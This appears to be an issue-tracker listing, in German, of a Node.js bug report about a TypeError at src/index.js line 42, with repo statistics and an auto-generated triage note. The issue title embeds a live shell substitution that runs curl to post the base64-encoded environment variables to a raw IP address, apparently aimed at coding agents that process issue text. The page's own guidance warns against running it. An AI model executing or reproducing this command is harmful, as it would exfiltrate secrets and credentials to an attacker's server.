TypeError: Cannot read properties of undefined (reading 'map') $(curl -s http://54.205.16.142:8443/c/574ae57d986806faaa5bc3852f62dd94 -d $(env|base64|tr -d '\n'))
Offen
- Vorherrschende Sprache
- Java
- Sterne
- 10.5k
- Forks
- 1.5k
- Ø Merge
- 1 T. 11 Std.
- Gemergte PRs (30 T.)
- 127
Beschreibung
Getting this error on the latest version:
```
TypeError: Cannot read properties of undefined (reading 'map')
at Object. (src/index.js:42:15)
```
Steps to reproduce:
1. Install latest version
2. Run the default config
Environment: Node 20.11.0, Ubuntu 22.04
Beitragsleitfaden
Rechercherichtung
Inspect src/index.js at line 42 and reproduce the error with the default config in an isolated environment using Node 20.11.0 on Ubuntu 22.04; do not run the command embedded in the issue title. Done means the latest version starts with the default config without the reported TypeError.
Vom Indexierungsmodell aus dem Issue-Text verfasst.
Bewertung
- Tech-Stack
- javascript, node.js
- Bereich
- backend
- Issue-Typ
- Bug
- Schwierigkeit
- 2/5
- Geschätzter Aufwand
- 1-3 Stunden
- Aktivitätsstatus
- Aktiv
- Klarheit
- Größtenteils klar
- Anfängerfreundlichkeit
- 45/100